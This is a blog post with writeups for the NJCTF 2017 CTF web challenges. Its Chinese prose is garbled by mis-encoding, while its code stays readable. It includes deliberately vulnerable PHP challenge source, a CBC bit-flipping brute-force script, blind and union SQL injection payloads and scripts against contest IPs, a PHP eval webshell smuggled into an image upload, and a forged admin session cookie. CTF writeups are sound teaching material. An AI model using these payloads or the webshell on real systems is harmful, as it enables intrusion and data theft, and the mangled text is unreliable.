LoRexxar's Blog

NJCTF Web閮ㄥ垎writeup

2017/03/13

鍙堝埌浜嗕竴骞翠竴搴︾殑姣旇禌瀛o紝杩欐鎵撲簡鎵撹禌瀹佽嚜宸卞姙鐨凬JCTF锛岃繖閲岀◢寰暣鐞嗕笅Web閮ㄥ垎鐨剋p锛岃櫧鐒朵笉鐭ラ亾棰樼洰鏄皝鍑虹殑锛屼絾鏄垜瑙夊緱澶ч儴鍒嗛鐩繕鏄尯锠㈢殑鈥︾湅鐨勪汉浠庝腑姹插彇鑷繁鎯宠鐨勭煡璇嗗氨濂姐

image_1bb32tqf61up77bn1mgpre7c4j9.png-135.1kB

image_1bb32ubhv13cp1s2u1biup751ra9m.png-753kB

image_1bb32up8j1di9h6p1eg97fleh13.png-895.8kB

Web

Login

1
login?

娌″暐濂界帺鐨勶紝娉ㄥ唽鐨勬椂鍊欐湁瓒呴暱鐢ㄦ埛鍚嶆埅鏂

鍘熺悊灏辨槸鐢ㄦ埛鍚嶅湪check鐨勬椂鍊欐槸涓嶅悓鐨勶紝浣嗘槸鏁版嵁搴撳瓧娈典繚瀛樻槸鏈夐暱搴︾殑锛屾墍浠ヤ細鍙戠敓鎴柇锛屾敞鍐屼腑闂翠负绌烘牸鐨勮秴闀跨敤鎴峰悕灏卞彲浠ユ埅鏂负admin

Get Flag

1
2
3
鍒獴B锛屾潵鎷縁LAG
PS:delay 5s

鍛戒护鎵ц锛屾病浠涔堝ソ璇寸殑銆

cat 鍚庣敤 & ls 鍒楃洰褰曚笅鏂囦欢
flag鍦../../../9iZM2qTEmq67SOdJp%!oJm2%M4!nhS_thi5_flag

Text Wall

瀛樺湪.index.php.swo锛岀劧鍚庡彲浠ユ壘鍒板師棰

https://losfuzzys.github.io/writeup/2016/10/02/tumctf-web50/

棰樼洰婧愮爜

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
<?php
//The flag is /var/www/PnK76P1IDfY5KrwsJrh1pL3c6XJ3fj7E_fl4g
$lists = [];
Class filelist{
public function __toString()
{
return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
}
}
if(isset($_COOKIE['lists'])){
$cookie = $_COOKIE['lists'];
$hash = substr($cookie, 0, 40);
$sha1 = substr($cookie, 40);
if(sha1($sha1) === $hash){
$lists = unserialize($sha1);
}
}
if(isset($_POST['hiehiehie'])){
$info = $_POST['hiehiehie'];
$lists[] = $info;
$sha1 = serialize($lists);
$hash = sha1($sha1);
setcookie('lists', $hash.$sha1);
header('Location: '.$_SERVER['REQUEST_URI']);
exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Please Get Flag!!</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="http://apps.bdimg.com/libs/bootstrap/3.3.0/css/bootstrap.min.css">
<script src="http://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="http://apps.bdimg.com/libs/bootstrap/3.3.0/js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
<div class="jumbotron">
<h1>Please Get Flag!!</h1>
</div>
<div class="row">
<?php foreach($lists as $info):?>
<div class="col-sm-4">
<h3><?=$info?></h3>
</div>
<?php endforeach;?>
</div>
<form method="post" href=".">
<input name="hiehiehie" value="hiehiehie">
<input type="submit" value="submit">
</form>
</div>
</body>
</html>

娌″暐璇寸殑锛屽氨鎶妋d5鏀规垚浜唖ha1

Be admin

瀛樺湪index.php.bak,cbc鍙嶈浆鍔犲瘑銆傞厤鍚坰ql娉ㄥ叆銆

棰樼洰涓嶆槸鎴戝仛鐨勶紝鎵浠ヤ笉澶氭壇浜嗭紝璐翠笂鑴氭湰

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import requests
import urllib
aa = ')\xa5\xa1\xec>)F\x119\xbc\xfcor\x11\xd9\xa4'
url = "http://218.2.197.235:23737/"
cookie = {"PHPSESSID":"qe6s9hjkpqrfcv07hf1ous71m7"}
iv = ["\x00"]*16
cipher = ['\x00', 236, 46, 92, 100, 49, 71, 211, 255, 106, 69, 3, 16, 13, 233, 54]
plain = "admin"
plain += 11*chr(11)
plain = list(plain)
# for i in xrange(16,17):
# for j in xrange(1,i):
# iv[16-i+j] = chr(cipher[16-i+j] ^ i)
# for x in xrange(218,256):
# iv[16-i] = chr(x)
# tmp_iv = "".join(iv)
# cookie['token'] = urllib.quote(base64.b64encode(tmp_iv))
# print cookie
# try:
# r = requests.get(url, cookies=cookie)
# print "%s"%x, r.content
# except:
# print cipher
# print x
# exit();
# if "ctfer!" in r.content:
# break
# else:
# print cipher
# exit();
# cipher[16-i] = x ^ i
# break
# print cipher
# for x in cipher:
# print hex(x)
plain = ['a', '\x88', 'C', '5', '\n', ':', 'L', '\xd8', '\xf4', 'a', 'N', '\x08', '\x1b', '\x06', '\xe2', '=']
for x in xrange(193,256):
plain[0] = chr(x)
tmp_p = "".join(plain)
cookie['token'] = urllib.quote(base64.b64encode(tmp_p))
r = requests.get(url, cookies=cookie)
print x
print r.content

杩欓噷鍧戠壒鍒ぇ锛屾湇鍔″櫒缁忓父璺戠潃璺戠潃灏辫ban浜嗭紝鐒跺悗棰樼洰鍙堟槸蹇呴』瑕佽窇鐨

blog

ruby web浠g爜瀹¤

浠庡ご鐪嬩竴閬嶅熀鏈笂鑳藉彂鐜拌繖浠g爜鍩烘湰娌′粈涔堝姛鑳斤紝鎺у埗鍣ㄩ噷鍩烘湰涓婂氨鏄叧浜巙ser鐨勪笢瑗匡紝鍩烘湰灏辨槸鍏充簬鐢ㄦ埛淇℃伅鐨勫鍒犳敼鏌ャ

鎵浠ラ棶棰樺叾瀹炲熀鏈氨鏄嚭鐜板湪鍦ㄨ繖閲屻

image_1bb35c0pc1tnh19vi150lh7ma51u.png-78.7kB

鏁版嵁搴撲腑鍏充簬admin瀛楁鐨勫畾涔夋槸榛樿涓篺alse锛屽湪娉ㄥ唽鍑芥暟閲岋紝admin鏄湁杈撳叆鐨

image_1bb35dook13ad2va11hr1g1q1kg52b.png-21.4kB

鑰岄粯璁や紶鍏ョ殑鏃跺欐槸涓嶈緭鍏ョ殑锛岄偅涔堥棶棰樹篃灏卞湪杩欓噷浜嗭紝濡傛灉娉ㄥ唽鐨勬椂鍊欎紶鍏ser[admin]=1

閭d箞璐︽埛灏变細琚畾涔変负admin锛岄涢涘氨鑳芥壘鍒癴lag浜

come on

杩欓鍦ㄦ瘮璧涙椂闂村唴娌¤兘鍋氬嚭鏉ワ紝浣嗗疄闄呬笂鏄垜寮辨櫤浜嗭紝棰樼洰涓嶉毦锛屽彧鏄お涔呮病瑙佷簡锛屽帇鏍规病鎯冲埌锛屽瀛楄妭娉ㄥ叆銆

娴嬭瘯payload

1
2
3
http://218.2.197.235:23733/index.php?key=1%df%27||1=1%23
http://218.2.197.235:23733/index.php?key=1%df%27||1=2%23

浣嗘槸鏈変竴浜涗笢瑗胯杩囨护浜嗭紝姣斿union锛屽ぇ浜庡皬浜庡彿锛岃繕鏈夊ぇ鎶婂鐨勭洸娉ㄥ嚱鏁帮紝鏈鍚庡氨鍓╀笅left锛岃繖閲屾湁涓嚱鏁板彨鍋欱INARY锛岀敤浜庢瘮杈

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# coding=utf-8
import requests
import random
import hashlib
s = requests.Session()
def get_flag():
url='http://218.2.197.235:23733/index.php?key=123%df%27||'
flag = ""
payload = "if((select(right(left((select(flag)from(flag)),{}),1)))=binary({}),1,0)%23"
for j in range(1,33):
for i in range(20,120):
r = get_data(url + payload.format(str(j), hex(i)))
if "002265" in r:
flag +=chr(i)
print flag
break
def get_data(url):
r = s.get(url)
return r.text
get_flag()
NJCTF{5H0W_M3_S0M3_sQ1i_TrICk5}

wallet

闈炲父鎵緱鏄祴璇曚簡寰堜箙锛岀獊鐒剁粰浜唄int璇村帇缂╁寘瀵嗙爜鏄急鍙d护锛屾墠鍙嶅簲杩囨潵鏄湁婧愮爜

http://218.2.197.235:23723/www.zip

璺戜竴涓囨潯涔熸病鐢紝鍥犱负鍘嬬缉鍖呯殑瀵嗙爜鏄痭jctf2017锛屼粠杩欓噷灏辫兘鍙戠幇鍑洪浜虹殑鏃犺亰浜嗐傘傘

涓嬮潰鏄簮鐮

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?php
require_once "db.php";
$auth = 0;
if (isset($_COOKIE["auth"])) {
$auth = $_COOKIE["auth"];
$hsh = $_COOKIE["hsh"];
if ($auth == $hsh) {
$auth = 0;
} else {
if (sha1((string) $hsh) == md5((string) $auth)) {
$auth = 1;
} else {
$auth = 0;
}
}
} else {
$auth = 0;
$s = $auth;
setcookie("auth", $s);
setcookie("hsh", sha1((string) $s));
}
if ($auth) {
if (isset($_GET['query'])) {
$db = new SQLite3($SQL_DATABASE, SQLITE3_OPEN_READONLY);
$qstr = SQLITE3::escapeString($_GET['query']);
$query = "SELECT amount FROM my_wallets WHERE id={$qstr}";
$result = $db->querySingle($query);
if (!$result === NULL) {
echo "Error - invalid query";
} else {
echo "Wallet contains: {$result}";
}
} else {
echo "<html><head><title>Admin Page</title></head><body>Welcome to the admin panel!<br /><br /><form name='input' action='admin.php' method='get'>Wallet ID: <input type='text' name='query'><input type='submit' value='Submit Query'></form></body></html>";
}
} else {
echo "Sorry, not authorized.";
}

鍓嶉潰鏄急绫诲瀷姣旇緝锛岃佹浜嗭紝杩欐鏄痵ha1鍜宮d5姣旇緝锛岄殢渚胯窇璺戝氨鏈変簡

https://www.whitehatsec.com/blog/magic-hashes/

鎺ヤ笅鏉ュ氨鏄痵qlite鐨勬敞鍏ヤ簡锛屼竴鑸潵璇达紝鎴戜滑娉ㄥ叆sqlite鏁版嵁搴擄紝瑕佷粠sqlite_master鑾峰彇寤鸿〃鐨勮鍙ヤ互鍙婅〃鍚嶏紝浣嗘槸杩欓噷鎶妔ql鍒楀垹闄や簡锛屽彧鑳借幏寰楄繑鍥炵殑琛ㄥ悕

涓鍏辨湁涓や釜琛紝flag琛ㄥ拰my_wallets琛紝鍓╀笅鐨勯棶棰樺氨鏄垪浜嗏︿絾鏄兂浜嗗緢澶氬姙娉曢兘娌″姙娉曞湪sqlite涓窇锛屾渶鍚庨殢鎵嬭瘯浜嗚瘯id鈥.

1
http://218.2.197.235:23723/admin.php?query=-1 union SELECT id FROM flag

Be Logical

绋嶅悗鍦ㄦ暣鐞嗗惂

pictures wall

鎰熻鏄釜寮辨櫤棰樼洰锛岄鍏堟槸闇瑕佺櫥褰曚负root锛屼絾鏄殢渚跨櫥褰曡繘鍘荤殑鏄釜娌$敤鐨勮处鎴凤紝浠涔堥兘鏀逛笉浜嗭紝缁撴灉鏄湪鐧诲綍鐨勬椂鍊欎慨鏀筯ost涓127.0.0.1锛屼粠浠g爜閲岀湅鏄繖鏍风殑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
require_once("./waf.php");
if(isset($_POST["username"]) && isset($_POST["password"])){
session_start();
$ip = $_SERVER['HTTP_HOST'];
if($ip == "::1" || $ip == "127.0.0.1"){
$_SESSION["token"] = "0";
header("Location: index.php");
}else{
$key = $_POST["username"] . "~:" . $_POST["password"];
$_SESSION["token"] = base64_encode($key);
header("Location: index.php");
}
}else{
header("Location: login.html");
exit();
}
?>

鐒跺悗鏄叧閿儴鍒嗕簡锛屼篃灏辨槸缁曡繃涓婁紶鏂囦欢鐨剋af锛岃繖閲屽畬鍏ㄦ槸鐧藉悕鍗曟娴嬬殑锛屽彧鏈塸html鍙互涓嶈鏀瑰悕

image_1bb3e0eq5ppbvk13rf1nrqhjn2o.png-188.2kB

鈥.杩蜂竴鏍风殑浠g爜锛屼笂浼犲浘鐗囷紝鐒跺悗淇敼鍚庣紑涓簆html锛屽湪鍥剧墖鍚庡姞鍏

1
<script language="php"> @eval($_POST[ddog])</script>

getshell

chall 1 2

璇村疄璇濓紝鍘熼杩樻槸涓嶉敊鐨勯鐩紝浣嗘槸涓嶇煡閬撲负浠涔堝己琛岃鎾曟垚浜嗕袱棰橈紝杩樺己琛屽姞鍏ヤ簡鑴戞礊鈥

鍋氶鑳芥壘鍒板師棰樼殑wp
https://www.smrrd.de/nodejs-hacking-challenge-writeup.html

浣嗛鐩湁鏀硅繃锛屾祴璇曚簡涓嬪簲璇ユ槸鍦╟heck瀵嗙爜鐨勬椂鍊欒繃浜嗕竴灞俶d5锛屽湪nodejs涓紝鍔犲瘑鍑芥暟鍙帴鍙楀瓧绗︿覆鍜宐uffer锛屾墍浠ュ師棰樼殑瑙f硶浼犲叆鏁板瓧灏变細鎶ラ敊銆

杩欓噷鏈変釜绁炲鐨則rick锛屽湪nodejs涓紝濡傛灉瀛楃涓蹭腑鍏ㄦ槸鏁板瓧锛屽瓧绗︿覆灏变細鍙樻垚鏁板瓧锛堢湡鏄tmd鈥︼級

钃濈尗甯堝倕璇村苟娌℃湁杩欑浜嬫儏鈥﹁繖涓拰鈥1鈥==1鐨勫師鐞嗕笉鍚岋紝杩欓噷鏄洜涓烘垜鐩茬寽浜嗘簮鐮侊紝github鎼滅储bibibibibi浠涔堢殑锛屽彲浠ユ壘鍒扮湡姝g殑浠g爜锛岀劧鍚庤繖閲岀殑鏁版嵁鏄繃浜唒arseInt锛屾墍浠ュ瓧绗︿覆琚浆鎴愪簡鏁板瓧銆

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import hashlib
str = 100000
while 1:
m2 = hashlib.md5()
m2.update(repr(str))
mm =m2.hexdigest()
if 'a' not in mm:
if 'b' not in mm:
if 'c' not in mm:
if 'd' not in mm:
if 'e' not in mm:
if 'f' not in mm:
print str
break
str+=1

寰堝揩灏辫窇鍒颁竴涓1518375锛屽紑濮嬫壘缂撳啿鍖洪噷鐨勬暟鎹︽湁鐐瑰効铔嬬柤鐨勬槸锛宖lag姣旇緝灏戯紝鎴戝ぇ姒傝窇浜1m宸﹀彸鐨勬枃瀛楁暟鎹墠鎵惧埌flag

涓嬮潰灏辨槸鏈澶х殑鑴戞礊闂浜嗭紝涓婇潰鎵惧埌鐨刦lag鏄繖鏍风殑

1
NJCTF{P1e45e_s3arch_th1s_s0urce_cod3_0lddriver}

浣嗕簨瀹炰笂锛岀浜岄灏辨槸鍘熼涓殑鎬濊矾锛岃宖lag1灏辨槸secretkey锛浣嗛鐩腑骞舵病鏈夋簮鐮佲

涔熷氨鏄鏋滀綘鎯冲仛鍑虹浜岄锛岄渶瑕佷笂缃戞壘鍒板師棰樼殑wp锛岀劧鍚庝笅杞戒唬鐮侊紝鏈湴鎼缓鐒跺悗淇敼榛樿涓篴dmin:yes锛屾妸cookie浠e叆绾夸笂绔欙紝getflag2鈥.

1
session=eyJhZG1pbiI6InllcyJ9; session.sig=DLXp3JcD1oX3c8v4pUgOAn-pDYo

Guess

鎸虹壒鍒殑涓棰橈紝鍏跺疄澶ч儴鍒嗘濊矾閮藉拰hctf涓殑鍏佃呭璇′竴鏍凤紝浣嗘槸杩欐鐨勯毦鐐瑰湪浜庯紝鏂囦欢鍚嶆湭鐭ワ紝鎴戜滑鏉ョ湅鐪嬩唬鐮

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
upload.php
<?php
error_reporting(0);
function show_error_message($message)
{
die("<div class=\"msg error\" id=\"message\">
<i class=\"fa fa-exclamation-triangle\"></i>$message</div>");
}
function show_message($message)
{
echo("<div class=\"msg success\" id=\"message\">
<i class=\"fa fa-exclamation-triangle\"></i>$message</div>");
}
function random_str($length = "32")
{
$set = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F",
"g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L",
"m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R",
"s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X",
"y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");
$str = '';
for ($i = 1; $i <= $length; ++$i) {
$ch = mt_rand(0, count($set) - 1);
$str .= $set[$ch];
}
return $str;
}
session_start();
$reg='/gif|jpg|jpeg|png/';
if (isset($_POST['submit'])) {
$seed = rand(0,999999999);
mt_srand($seed);
$ss = mt_rand();
$hash = md5(session_id() . $ss);
setcookie('SESSI0N', $hash, time() + 3600);
if ($_FILES["file"]["error"] > 0) {
show_error_message("Upload ERROR. Return Code: " . $_FILES["file-upload-field"]["error"]);
}
$check1 = ((($_FILES["file-upload-field"]["type"] == "image/gif")
|| ($_FILES["file-upload-field"]["type"] == "image/jpeg")
|| ($_FILES["file-upload-field"]["type"] == "image/pjpeg")
|| ($_FILES["file-upload-field"]["type"] == "image/png"))
&& ($_FILES["file-upload-field"]["size"] < 204800));
$check2=!preg_match($reg,pathinfo($_FILES['file-upload-field']['name'], PATHINFO_EXTENSION));
if ($check2) show_error_message("Nope!");
if ($check1) {
$filename = './uP1O4Ds/' . random_str() . '_' . $_FILES['file-upload-field']['name'];
if (move_uploaded_file($_FILES['file-upload-field']['tmp_name'], $filename)) {
show_message("Upload successfully. File type:" . $_FILES["file-upload-field"]["type"]);
} else show_error_message("Something wrong with the upload...");
} else {
show_error_message("only allow gif/jpeg/png files smaller than 200kb!");
}
}
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
index.php
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Upload</title>
<link rel="stylesheet" href="http://fortawesome.github.io/Font-Awesome/assets/font-awesome/css/font-awesome.css">
<link rel="stylesheet" href="CSS/upload.css">
</head>
<body>
<div class="msg info" id="message">
<i class="fa fa-info-circle"></i>please upload an IMAGE file (gif|jpg|jpeg|png)
</div>
<div class="container">
<form action="?page=upload" method="post" enctype="multipart/form-data" class="form">
<div class="file-upload-wrapper" id="file" data-text="Select an image!">
<label for="file-upload"> <input name="file-upload-field" type="file" class="file-upload-field" value=""
id="file-upload"></label>
</div>
<div class="div">
<input class="button" type="submit" value="Upload Image" name="submit">
</div>
</form>
<script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script src="js/filename.js"></script>
</div>
</body>
</html>
<?php
error_reporting(0);
session_start();
if(isset($_GET['page'])){
$page=$_GET['page'];
}else{
$page=null;
}
if(preg_match('/\.\./',$page))
{
echo "<div class=\"msg error\" id=\"message\">
<i class=\"fa fa-exclamation-triangle\"></i>Attack Detected!</div>";
die();
}
?>
<?php
if($page)
{
if(!(include($page.'.php')))
{
echo "<div class=\"msg error\" id=\"message\">
<i class=\"fa fa-exclamation-triangle\"></i>error!</div>";
exit;
}
}
?>

寰堝鏄撶湅鍒伴棶棰樹簡锛屽鏋滄垜浠兂瑕佺煡閬撴枃浠跺悕锛岄偅灏卞彧鑳界垎鐮撮殢鏈烘暟绉嶅瓙锛岀湅涓婂幓寰堝ぇ锛屼簨瀹炰笂鏄兘鐖嗙牬鍑烘潵鐨

{2C8B3DAC-ABA2-1DE1-B5E4-5084A09E2F83}.png-93.7kB

CATALOG
  1. 1. Web
    1. 1.1. Login
    2. 1.2. Get Flag
    3. 1.3. Text Wall
    4. 1.4. Be admin
    5. 1.5. blog
    6. 1.6. come on
    7. 1.7. wallet
    8. 1.8. Be Logical
    9. 1.9. pictures wall
    10. 1.10. chall 1 2
    11. 1.11. Guess